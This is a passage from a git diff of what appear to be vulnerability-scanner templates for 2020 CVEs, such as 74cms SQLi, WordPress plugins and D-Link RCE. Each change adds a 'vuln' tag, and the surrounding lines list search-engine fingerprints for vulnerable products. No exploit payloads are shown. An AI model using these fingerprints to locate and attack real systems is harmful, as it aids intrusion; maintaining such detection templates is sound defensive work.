cve2020,cve,74cms,sqli,vkev + tags: cve2020,cve,74cms,sqli,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index 933aadf3a30..33a6944a109 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -32,7 +32,7 @@ info: fofa-query: - app="74cms" - body="74cms" - tags: cve,cve2020,74cms,sqli + tags: cve,cve2020,74cms,sqli,vuln variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 214ad739b43..ce65bb4c81a 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -30,7 +30,7 @@ info: fofa-query: - app="74cms" - body="74cms" - tags: cve,cve2020,74cms,sqli + tags: cve,cve2020,74cms,sqli,vuln variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index d738d9afd44..86aadf06adf 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -30,7 +30,7 @@ info: fofa-query: - app="74cms" - body="74cms" - tags: cve,cve2020,74cms,sqli,vkev + tags: cve,cve2020,74cms,sqli,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index fb07341b3ef..2e9f1a0a034 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: b2evolution product: b2evolution - tags: cve,cve2020,packetstorm,edb,redirect,b2evolution + tags: cve,cve2020,packetstorm,edb,redirect,b2evolution,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index 5f1afe7a2c6..1bd2e2502fd 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"opnsense" fofa-query: title="opnsense" google-query: intitle:"opnsense" - tags: cve2020,cve,redirect,opnsense + tags: cve2020,cve,redirect,opnsense,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index dfd65ff0a4b..f6ccfbfc399 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -35,7 +35,7 @@ info: - title="HighMail" - title="highmail" google-query: intitle:"highmail" - tags: cve,cve2020,xss,cms,highmail,aryanic + tags: cve,cve2020,xss,cms,highmail,aryanic,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index 6d7553047b7..6f3105dd379 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -28,7 +28,7 @@ info: product: d-copia253mf_plus_firmware shodan-query: http.favicon.hash:-50306417 fofa-query: icon_hash=-50306417 - tags: cve2020,cve,printer,iot,lfi,edb,kyocera,vkev + tags: cve2020,cve,printer,iot,lfi,edb,kyocera,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index cc9a439305c..a82d859cc03 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -29,7 +29,7 @@ info: product: monstra_cms shodan-query: http.favicon.hash:419828698 fofa-query: icon_hash=419828698 - tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated,monstra + tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated,monstra,vuln variables: string: "{{to_lower('{{randstr}}')}}" diff --git a/http/cves/2020/CVE-2020-23814.yaml b/http/cves/2020/CVE-2020-23814.yaml index 0dd12204f23..88a7882621b 100644 --- a/http/cves/2020/CVE-2020-23814.yaml +++ b/http/cves/2020/CVE-2020-23814.yaml @@ -28,7 +28,7 @@ info: fofa-query: - app="xxl-job" - icon_hash=1691956220 - tags: cve,cve2020,xxl-job,xss,authenticated,vkev + tags: cve,cve2020,xxl-job,xss,authenticated,vkev,vuln flow: http(1) && http(2) && http(3) && http(4) diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml index 88d973e9e7a..aebffbcd66a 100644 --- a/http/cves/2020/CVE-2020-23972.yaml +++ b/http/cves/2020/CVE-2020-23972.yaml @@ -30,7 +30,7 @@ info: vendor: gmapfp product: gmapfp framework: joomla\! - tags: cve2020,cve,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\!,vkev + tags: cve2020,cve,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\!,vkev,vuln variables: name: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index ad09976d53d..94efaf97e75 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -28,7 +28,7 @@ info: framework: wordpress shodan-query: http.html:"import-xml-feed" fofa-query: body="import-xml-feed" - tags: cve,cve2020,wordpress,wp-plugin,ssrf,mooveagency + tags: cve,cve2020,wordpress,wp-plugin,ssrf,mooveagency,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index 3592b1cf159..6357c32d0ed 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -28,7 +28,7 @@ info: vendor: gvectors product: wpdiscuz framework: wordpress - tags: cve,cve2020,rce,fileupload,packetstorm,wordpress,wp-plugin,intrusive,gvectors + tags: cve,cve2020,rce,fileupload,packetstorm,wordpress,wp-plugin,intrusive,gvectors,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 98aca8a759d..fe6a5c2ce9c 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mara_cms_project product: mara_cms - tags: cve2020,cve,mara,xss,edb,mara_cms_project + tags: cve2020,cve,mara,xss,edb,mara_cms_project,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-24285.yaml b/http/cves/2020/CVE-2020-24285.yaml index 3660728ac68..bff9aa3cdce 100644 --- a/http/cves/2020/CVE-2020-24285.yaml +++ b/http/cves/2020/CVE-2020-24285.yaml @@ -25,7 +25,7 @@ info: verified: true shodan-query: html:"/cgi-bin/cgiServer.exx" fofa-query: body="/cgi-bin/cgiServer.exx" - tags: cve,cve2020,intelbras,telefone,tip200,exposure,lfi + tags: cve,cve2020,intelbras,telefone,tip200,exposure,lfi,vuln variables: username: "admin" diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index bb8cfde31ce..acc9f9ccc74 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -29,7 +29,7 @@ info: vendor: webdesi9 product: file_manager framework: wordpress - tags: cve,cve2020,wordpress,backups,plugin,webdesi9 + tags: cve,cve2020,wordpress,backups,plugin,webdesi9,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index 70e5bc8dfd0..a67a29546fb 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"mongo express" fofa-query: title="mongo express" google-query: intitle:"mongo express" - tags: cve,cve2020,mongo,express,rce,intrusive,mongo-express_project,node.js + tags: cve,cve2020,mongo,express,rce,intrusive,mongo-express_project,node.js,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml index 75813e8e45b..ef8709d6d79 100644 --- a/http/cves/2020/CVE-2020-24550.yaml +++ b/http/cves/2020/CVE-2020-24550.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: episerver product: find - tags: cve,cve2020,redirect,episerver + tags: cve,cve2020,redirect,episerver,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-24571.yaml b/http/cves/2020/CVE-2020-24571.yaml index c874a619b73..8956224a6c6 100644 --- a/http/cves/2020/CVE-2020-24571.yaml +++ b/http/cves/2020/CVE-2020-24571.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: nexusdb product: nexusdb - tags: cve,cve2020,nexusdb,lfi + tags: cve,cve2020,nexusdb,lfi,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 7239de23b24..b5d66c1f337 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: dlink product: dsl2888a_firmware - tags: cve,cve2020,dlink,rce + tags: cve,cve2020,dlink,rce,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index 245bb1934af..7d6ea17bd68 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.favicon.hash:1398055326 fofa-query: icon_hash=1398055326 google-query: inurl:"carbon/admin/login" - tags: cve2020,cve,wso2,xxe,oast,blind,vkev + tags: cve2020,cve,wso2,xxe,oast,blind,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-24701.yaml b/http/cves/2020/CVE-2020-24701.yaml index ede5c125648..a5aa76e5b7c 100644 --- a/http/cves/2020/CVE-2020-24701.yaml +++ b/http/cves/2020/CVE-2020-24701.yaml @@ -29,7 +29,7 @@ info: - html:"Appsuite" - http.html:"appsuite" fofa-query: body="appsuite" - tags: cve,cve2020,packetstorm,seclists,appsuite,xss,open-xchange + tags: cve,cve2020,packetstorm,seclists,appsuite,xss,open-xchange,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-24881.yaml b/http/cves/2020/CVE-2020-24881.yaml index 2cfd858257d..da2b8457348 100644 --- a/http/cves/2020/CVE-2020-24881.yaml +++ b/http/cves/2020/CVE-2020-24881.yaml @@ -23,7 +23,7 @@ info: vendor: osticket product: osticket shodan-query: title:"osticket" - tags: cve,cve2020,osticket,ssrf,authenticated + tags: cve,cve2020,osticket,ssrf,authenticated,vuln flow: http(1) && http(2) && http(3) && http(4) diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index f8bac53c9c8..def0ca627be 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -34,7 +34,7 @@ info: google-query: - intitle:"My Download Server" - intitle:"my download server" - tags: cve,cve2020,quixplorer,xss,quixplorer_project + tags: cve,cve2020,quixplorer,xss,quixplorer_project,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index e55842939c4..9d047b271fc 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -31,7 +31,7 @@ info: shodan-query: - http.component:"ASP.NET" - http.component:"asp.net" - tags: cve,cve2020,cuteeditor,xss,seclists,cutesoft,asp.net + tags: cve,cve2020,cuteeditor,xss,seclists,cutesoft,asp.net,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index 0ba6ab581c3..647d790eaa5 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: qcubed product: qcubed - tags: cve2020,cve,qcubed,xss,seclists + tags: cve2020,cve,qcubed,xss,seclists,vuln http: - method: POST diff --git a/http/cves/2020/CVE-2020-24949.yaml b/http/cves/2020/CVE-2020-24949.yaml index 9522fa79dd3..eb62cfadffe 100644 --- a/http/cves/2020/CVE-2020-24949.yaml +++ b/http/cves/2020/CVE-2020-24949.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: php-fusion product: php-fusion - tags: cve,cve2020,rce,php,packetstorm,phpfusion,php-fusion,vkev + tags: cve,cve2020,rce,php,packetstorm,phpfusion,php-fusion,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml index 4ab966c0309..d438229088e 100644 --- a/http/cves/2020/CVE-2020-25078.yaml +++ b/http/cves/2020/CVE-2020-25078.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: dlink product: dcs-2530l_firmware - tags: cve,cve2020,dlink,kev,vkev + tags: cve,cve2020,dlink,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index c216e7dbc12..8209fe013a4 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -30,7 +30,7 @@ info: vendor: webdesi9 product: file_manager framework: wordpress - tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive,packetstorm,webdesi9,vkev + tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive,packetstorm,webdesi9,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index 0b15ac69d49..7896a6a2342 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"securepoint utm" fofa-query: title="securepoint utm" google-query: intitle:"securepoint utm" - tags: cve,cve2020,sophos,rce,oast,unauth,kev,vkev + tags: cve,cve2020,sophos,rce,oast,unauth,kev,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index 3b16697571b..c91ce3a3c5b 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: xinuos product: openserver - tags: cve2020,cve,sco,xss,edb,packetstorm,intrusive,xinuos + tags: cve2020,cve,sco,xss,edb,packetstorm,intrusive,xinuos,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml index e97e7bee3fc..8c4a7eb4266 100644 --- a/http/cves/2020/CVE-2020-25506.yaml +++ b/http/cves/2020/CVE-2020-25506.yaml @@ -29,7 +29,7 @@ info: product: dns-320_firmware shodan-query: http.html:"sharecenter" fofa-query: body="sharecenter" - tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev,vkev + tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev,vkev,vuln variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index 07a7befb423..fe624cd63b2 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -32,7 +32,7 @@ info: - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: cve2020,cve,oracle,weblogic,rce,unauth,kev,vkev + tags: cve2020,cve,oracle,weblogic,rce,unauth,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index 59a5aace6f4..de1652acd27 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: thinkadmin product: thinkadmin - tags: cve,cve2020,thinkadmin,lfi,edb,packetstorm,ctolog,vkev + tags: cve,cve2020,thinkadmin,lfi,edb,packetstorm,ctolog,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index d5cc0c1979e..cbcc32e9d03 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: commvault product: commcell - tags: cve,cve2020,commvault,lfi + tags: cve,cve2020,commvault,lfi,vuln http: - method: POST diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index 273d9bdfff1..73ed2699948 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -32,7 +32,7 @@ info: - cpe:"cpe:2.3:a:hashicorp:consul" fofa-query: title="consul by hashicorp" google-query: intitle:"consul by hashicorp" - tags: cve,cve2020,consul,xss,intrusive,hashicorp + tags: cve,cve2020,consul,xss,intrusive,hashicorp,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-26073.yaml b/http/cves/2020/CVE-2020-26073.yaml index d4f871f1e58..1911e4d0b38 100644 --- a/http/cves/2020/CVE-2020-26073.yaml +++ b/http/cves/2020/CVE-2020-26073.yaml @@ -19,7 +19,7 @@ info: epss-percentile: 0.99532 metadata: max-request: 1 - tags: cve,cve2020,cisco,lfi,vkev + tags: cve,cve2020,cisco,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index 5a8c25a2609..253784c9cee 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -29,7 +29,7 @@ info: vendor: eventespresso product: "event_espresso" framework: wordpress - tags: cve2020,cve,xss,wordpress,wp-plugin,eventespresso + tags: cve2020,cve,xss,wordpress,wp-plugin,eventespresso,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml index 24a0dd70faa..c131d0cb89a 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: alerta_project product: alerta - tags: cve,cve2020,alerta,auth-bypass,alerta_project,passive + tags: cve,cve2020,alerta,auth-bypass,alerta_project,passive,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml index 4763f636628..ff2545588ee 100644 --- a/http/cves/2020/CVE-2020-26217.yaml +++ b/http/cves/2020/CVE-2020-26217.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2020,xstream,deserialization,rce,oast,xstream_project + tags: cve,cve2020,xstream,deserialization,rce,oast,xstream_project,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index ae2a21cbb34..9aad97111a4 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml @@ -29,7 +29,7 @@ info: vendor: prestashop product: productcomments framework: prestashop - tags: time-based-sqli,cve,cve2020,packetstorm,sqli,prestshop,prestashop + tags: time-based-sqli,cve,cve2020,packetstorm,sqli,prestshop,prestashop,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml index d8e0474336d..04eed444ade 100644 --- a/http/cves/2020/CVE-2020-26258.yaml +++ b/http/cves/2020/CVE-2020-26258.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2020,xstream,ssrf,oast,xstream_project + tags: cve,cve2020,xstream,ssrf,oast,xstream_project,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index 639202393e6..65c58d1bcb1 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -33,7 +33,7 @@ info: - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" - tags: cve,cve2020,hackerone,gitlab,exposure,enum,graphql + tags: cve,cve2020,hackerone,gitlab,exposure,enum,graphql,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-26876.yaml b/http/cves/2020/CVE-2020-26876.yaml index 0c6e7b5e6ac..7d2c504ddda 100644 --- a/http/cves/2020/CVE-2020-26876.yaml +++ b/http/cves/2020/CVE-2020-26876.yaml @@ -28,7 +28,7 @@ info: vendor: wpcoursesplugin product: wp-courses framework: wordpress - tags: cve,cve2020,wordpress,wp-plugin,exposure,edb,wpcoursesplugin,vkev + tags: cve,cve2020,wordpress,wp-plugin,exposure,edb,wpcoursesplugin,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-26879.yaml b/http/cves/2020/CVE-2020-26879.yaml index ff07a49b146..8da2ed07755 100644 --- a/http/cves/2020/CVE-2020-26879.yaml +++ b/http/cves/2020/CVE-2020-26879.yaml @@ -27,7 +27,7 @@ info: vendor: commscope product: ruckus_vriot shodan-query: html:"RIoT Controller" - tags: cve,cve2020,ruckus,vriot,iot,api,backdoor,auth-bypass,vkev + tags: cve,cve2020,ruckus,vriot,iot,api,backdoor,auth-bypass,vkev,vuln variables: username: "{{randstr_1}}" diff --git a/http/cves/2020/CVE-2020-26919.yaml b/http/cves/2020/CVE-2020-26919.yaml index 7079c83d25c..ad254e636b8 100644 --- a/http/cves/2020/CVE-2020-26919.yaml +++ b/http/cves/2020/CVE-2020-26919.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: netgear product: jgs516pe_firmware - tags: cve,cve2020,netgear,rce,oast,router,unauth,kev,vkev + tags: cve,cve2020,netgear,rce,oast,router,unauth,kev,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index 04cc3773e49..ca9b092e2ae 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.title:"emby" fofa-query: title="emby" google-query: intitle:"emby" - tags: cve2020,cve,emby,jellyfin,ssrf + tags: cve2020,cve,emby,jellyfin,ssrf,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml index c418ca68dd5..09788e2492f 100644 --- a/http/cves/2020/CVE-2020-27191.yaml +++ b/http/cves/2020/CVE-2020-27191.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: lionwiki product: lionwiki - tags: cve2020,cve,lionwiki,lfi,oss + tags: cve2020,cve,lionwiki,lfi,oss,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index 01df012cecb..2f05de3bee3 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -31,7 +31,7 @@ info: shodan-query: - port:8999 product:"Oracle WebLogic Server" - port:8999 product:"oracle weblogic server" - tags: cve2020,cve,oracle,weblogic,disclosure,exposure + tags: cve2020,cve,oracle,weblogic,disclosure,exposure,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml index c52e3f78029..dafdf9aed29 100644 --- a/http/cves/2020/CVE-2020-27361.yaml +++ b/http/cves/2020/CVE-2020-27361.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: akkadianlabs product: akkadian_provisioning_manager - tags: cve,cve2020,akkadian,listing,exposure,akkadianlabs + tags: cve,cve2020,akkadian,listing,exposure,akkadianlabs,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index 202a22c6386..322fe1ec3db 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -29,7 +29,7 @@ info: product: processwire shodan-query: http.html:"processwire" fofa-query: body="processwire" - tags: cve,cve2020,processwire,lfi,cms,oss + tags: cve,cve2020,processwire,lfi,cms,oss,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index bd1c4cf5d5b..fb1a52fed73 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -27,7 +27,7 @@ info: vendor: goodlayers product: good_learning_management_system framework: wordpress - tags: time-based-sqli,cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress,vkev + tags: time-based-sqli,cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-27615.yaml b/http/cves/2020/CVE-2020-27615.yaml index f9f366ec221..9797001a544 100644 --- a/http/cves/2020/CVE-2020-27615.yaml +++ b/http/cves/2020/CVE-2020-27615.yaml @@ -26,7 +26,7 @@ info: product: loginizer framework: wordpress publicwww-query: "/wp-content/plugins/loginizer" - tags: wpscan,cve,cve2020,wordpress,wp-plugin,wp,loginizer,sqli,time-based,vkev + tags: wpscan,cve,cve2020,wordpress,wp-plugin,wp,loginizer,sqli,time-based,vkev,vuln variables: password: "{{rand_base(8)}}" diff --git a/http/cves/2020/CVE-2020-27735.yaml b/http/cves/2020/CVE-2020-27735.yaml index 541a59ac14f..fb171c060d2 100644 --- a/http/cves/2020/CVE-2020-27735.yaml +++ b/http/cves/2020/CVE-2020-27735.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: wftpserver product: wing_ftp_server - tags: cve,cve2020,xss,wing-ftp,wftpserver + tags: cve,cve2020,xss,wing-ftp,wftpserver,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-27838.yaml b/http/cves/2020/CVE-2020-27838.yaml index 78c3ecb2465..30a85ee12cf 100644 --- a/http/cves/2020/CVE-2020-27838.yaml +++ b/http/cves/2020/CVE-2020-27838.yaml @@ -37,7 +37,7 @@ info: - icon_hash=-1105083093 - body="keycloak" google-query: intitle:"keycloak" - tags: cve,cve2020,keycloak,exposure,redhat + tags: cve,cve2020,keycloak,exposure,redhat,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index e7b6dbc6c44..bce5f22d89c 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: netgear product: ac2100_firmware - tags: cve,cve2020,netgear,auth-bypass + tags: cve,cve2020,netgear,auth-bypass,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index 3b2052e9061..78063dc1072 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -39,7 +39,7 @@ info: - intitle:"icewarp server administration" - intitle:"icewarp" - powered by icewarp 10.4.4 - tags: cve,cve2020,xss,icewarp,packetstorm,vkev + tags: cve,cve2020,xss,icewarp,packetstorm,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index 3c8508a0220..05c93c9354c 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: sonarsource product: sonarqube - tags: cve,cve2020,sonarqube,sonarsource,vkev + tags: cve,cve2020,sonarqube,sonarsource,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index 4f1db3bb599..2964bbf8a9a 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -31,7 +31,7 @@ info: fofa-query: - '"TerraMaster" && header="TOS"' - '"terramaster" && header="tos"' - tags: cve2020,cve,terramaster,enum,tos,terra-master,vkev + tags: cve2020,cve,terramaster,enum,tos,terra-master,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index 51bc6bd61b1..06c660256c8 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -28,7 +28,7 @@ info: vendor: terra-master product: tos fofa-query: '"terramaster" && header="tos"' - tags: cve2020,cve,packetstorm,terramaster,rce,oast,mirai,unauth,terra-master,vkev + tags: cve2020,cve,packetstorm,terramaster,rce,oast,mirai,unauth,terra-master,vkev,vuln variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index a4a48bd7d71..9b661b7680b 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"rocket.chat" fofa-query: title="rocket.chat" google-query: intitle:"rocket.chat" - tags: cve,cve2020,packetstorm,rocketchat,rocket.chat + tags: cve,cve2020,packetstorm,rocketchat,rocket.chat,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index b8328dad998..8b0bf5cc760 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ 